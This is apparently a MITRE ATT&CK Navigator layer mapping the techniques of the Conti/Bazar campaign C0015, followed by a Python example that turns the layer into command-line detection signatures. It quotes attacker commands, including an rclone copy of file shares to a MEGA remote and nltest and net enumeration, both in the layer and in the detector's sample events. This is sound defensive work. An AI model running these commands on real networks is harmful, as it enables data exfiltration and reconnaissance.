{
  "description": "Enterprise techniques used by C0015, ATT&CK campaign C0015 (v1.0)",
  "name": "C0015 (C0015)",
  "domain": "enterprise-attack",
  "versions": {"layer": "4.5", "attack": "19", "navigator": "5.3.2"},
  "techniques": [
    {"techniqueID": "T1059", "showSubtechniques": true},
    {"techniqueID": "T1059.003", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used `cmd.exe` to execute commands and run malicious binaries.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1059.005", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript/VBScript code.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1059.007", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used a malicious HTA file that contained a mix of encoded HTML and JavaScript/VBScript code.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1486", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used [Conti](https://attack.mitre.org/software/S0575) ransomware to encrypt a compromised network.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1005", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors obtained files and data from the compromised network.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1039", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors collected files from network shared drives prior to network encryption.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1074", "showSubtechniques": true},
    {"techniqueID": "T1074.001", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), PowerView's file share enumeration results were stored in the file `c:\\ProgramData\\found_shares.txt`.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1030", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors limited [Rclone](https://attack.mitre.org/software/S1040)'s bandwidth setting during exfiltration.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1482", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the command `nltest /domain_trusts /all_trusts` to enumerate domain trusts.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1567", "showSubtechniques": true},
    {"techniqueID": "T1567.002", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the [Rclone](https://attack.mitre.org/software/S1040) command `rclone.exe copy --max-age 2y \"\\\\SERVER\\Shares\" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1083", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors conducted a file listing discovery against multiple hosts to ensure locker encryption was successful.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1105", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors downloaded additional tools and files onto a compromised network.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1570", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used WMI to load [Cobalt Strike](https://attack.mitre.org/software/S0154) onto additional hosts within a compromised network.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1036", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors named a binary file `compareForfor.jpg` to disguise it as a JPG file.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1135", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors executed the PowerView ShareFinder module to identify open shares.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1027", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used Base64-encoded strings.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1588", "showSubtechniques": true},
    {"techniqueID": "T1588.001", "comment": "For [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used [Cobalt Strike](https://attack.mitre.org/software/S0154) and [Conti](https://attack.mitre.org/software/S0575) ransomware.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1588.002", "comment": "For [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors obtained a variety of tools, including [AdFind](https://attack.mitre.org/software/S0552), AnyDesk, and Process Hacker.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1069", "showSubtechniques": true},
    {"techniqueID": "T1069.001", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the command `net localgroup \"adminstrator\"` to identify accounts with local administrator rights.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1069.002", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the command `net group \"domain admins\" /dom` to enumerate domain groups.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1566", "showSubtechniques": true},
    {"techniqueID": "T1566.001", "comment": "For [C0015](https://attack.mitre.org/campaigns/C0015), security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1057", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the `tasklist /s` command as well as `taskmanager` to obtain a list of running processes.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1055", "showSubtechniques": true},
    {"techniqueID": "T1055.001", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used a DLL named `D8B3.dll` that was injected into the Winlogon process.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1219", "showSubtechniques": true},
    {"techniqueID": "T1219.002", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors installed the AnyDesk remote desktop application onto the compromised network.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1021", "showSubtechniques": true},
    {"techniqueID": "T1021.001", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used RDP to access specific network hosts of interest.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1018", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the commands `net view /all /domain` and `ping` to discover remote systems. They also used PowerView's PowerShell Invoke-ShareFinder script for file share enumeration.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1553", "showSubtechniques": true},
    {"techniqueID": "T1553.002", "comment": "For [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used DLL files that had invalid certificates.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1218", "showSubtechniques": true},
    {"techniqueID": "T1218.005", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used `mshta` to execute DLLs.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1218.010", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors employed code that used `regsvr32` for execution.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1218.011", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors loaded DLLs via `rundll32` using the `svchost` process.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1016", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used code to obtain the external public-facing IPv4 address of the compromised host.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1124", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the command `net view /all time` to gather the local time of a compromised network.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false},
    {"techniqueID": "T1204", "showSubtechniques": true},
    {"techniqueID": "T1204.002", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors relied on users to enable macros within a malicious Microsoft Word document.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true},
    {"techniqueID": "T1047", "comment": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used `wmic` and `rundll32` to load [Cobalt Strike](https://attack.mitre.org/software/S0154) onto a target host.(Citation: DFIR Conti Bazar Nov 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}
  ],
  "gradient": {"colors": ["#ffffff", "#66b1ff"], "minValue": 0, "maxValue": 1},
  "legendItems": [{"label": "used by C0015", "color": "#66b1ff"}]
}
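Added example, not part of the ATT&CK Navigator layer above or of the DFIR report it cites: a small script that parses a layer in this format, pulls the backtick-quoted attacker command lines out of the technique comments, and runs command-line signatures for the C0015 discovery and exfiltration commands (`nltest /domain_trusts`, `net group "domain admins" /dom`, `net view /all /domain`, the `rclone.exe copy ... Mega:DATA ... --bwlimit 10M` transfer) over a handful of constructed process-creation events. The trimmed layer, the events, the regex signatures and the `Mega:` remote-name match are all this example's own assumptions; ATT&CK ships no detection logic with the layer.

```python
"""Parse an ATT&CK Navigator layer and turn its comments into checks.

Example code written for this page; the layer excerpt, the events and the
signatures below are constructed for illustration.
"""
import json
import re

# Constructed: a trimmed copy of the C0015 layer with the same field names,
# so the parser runs offline. Parent entries ("T1059", "T1567") carry no
# "score" and only expand sub-techniques; scored entries are the ones used.
SAMPLE_LAYER = r'''{
  "name": "C0015 (C0015)",
  "domain": "enterprise-attack",
  "techniques": [
    {"techniqueID": "T1059", "showSubtechniques": true},
    {"techniqueID": "T1059.003", "comment": "During C0015, the threat actors used `cmd.exe` to execute commands and run malicious binaries.", "score": 1},
    {"techniqueID": "T1482", "comment": "During C0015, the threat actors used the command `nltest /domain_trusts /all_trusts` to enumerate domain trusts.", "score": 1},
    {"techniqueID": "T1567", "showSubtechniques": true},
    {"techniqueID": "T1567.002", "comment": "During C0015, the threat actors exfiltrated files to MEGA using the Rclone command `rclone.exe copy --max-age 2y \"\\\\SERVER\\Shares\" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`.", "score": 1}
  ]
}'''

BACKTICKED = re.compile(r"`([^`]+)`")


def load_layer(text: str) -> dict:
    """Parse layer JSON (kept as a function so callers need no json import)."""
    return json.loads(text)


def scored_techniques(layer: dict) -> list[str]:
    """Technique IDs the layer marks as used, i.e. entries carrying a score."""
    return sorted(t["techniqueID"] for t in layer["techniques"] if "score" in t)


def commands_in_layer(layer: dict) -> dict[str, list[str]]:
    """Map technique ID -> backtick-quoted command strings found in its comment."""
    out: dict[str, list[str]] = {}
    for t in layer["techniques"]:
        cmds = BACKTICKED.findall(t.get("comment", ""))
        if cmds:
            out[t["techniqueID"]] = cmds
    return out


# Command-line signatures derived from the layer's comments. The regexes are
# this example's own choice (assumption); "Mega:" is an attacker-chosen
# remote name, so production rules should key on the rclone binary itself.
SIGNATURES = {
    "T1482": re.compile(r"\bnltest(\.exe)?\b.*/domain_trusts", re.I),
    "T1069.002": re.compile(r'\bnet1?(\.exe)?\s+group\s+"?domain admins"?\s+/dom', re.I),
    "T1018": re.compile(r"\bnet1?(\.exe)?\s+view\s+/all\s+/domain\b", re.I),
    "T1567.002": re.compile(r"\brclone(\.exe)?\b.*\bcopy\b.*\bMega:", re.I),
    "T1030": re.compile(r"\brclone(\.exe)?\b.*--bwlimit\s+\d+[kmg]?\b", re.I),
}

# Constructed Sysmon-style process-creation events (Image + CommandLine only).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c nltest /domain_trusts /all_trusts"},
    {"Image": r"C:\Windows\System32\net.exe", "CommandLine": 'net group "domain admins" /dom'},
    {"Image": r"C:\ProgramData\rclone.exe",
     "CommandLine": r'rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M'},
    {"Image": r"C:\Windows\System32\net.exe", "CommandLine": "net view /all /domain"},
    {"Image": r"C:\Windows\System32\net.exe", "CommandLine": r"net use Z: \\fileserver\public /persistent:no"},  # benign
]


def detect(events: list[dict]) -> dict[int, list[str]]:
    """Return {event index: sorted technique IDs} for events whose CommandLine
    matches a signature; events with no match are left out."""
    hits: dict[int, list[str]] = {}
    for i, ev in enumerate(events):
        matched = sorted(tid for tid, rx in SIGNATURES.items()
                         if rx.search(ev.get("CommandLine", "")))
        if matched:
            hits[i] = matched
    return hits


def uncovered(layer: dict) -> list[str]:
    """Scored techniques with no command-line signature here; these need a
    different data source (file, network or image-load telemetry)."""
    return [tid for tid in scored_techniques(layer) if tid not in SIGNATURES]


if __name__ == "__main__":
    layer = load_layer(SAMPLE_LAYER)
    print("used:", scored_techniques(layer))
    print("commands:", commands_in_layer(layer))
    print("hits:", detect(SAMPLE_EVENTS))
    print("no signature:", uncovered(layer))
```

Run against the full layer above by pointing `load_layer` at its text instead of `SAMPLE_LAYER`; `uncovered` then lists the techniques (encryption, collection, injection, signed-DLL abuse) that a command-line rule set alone cannot see.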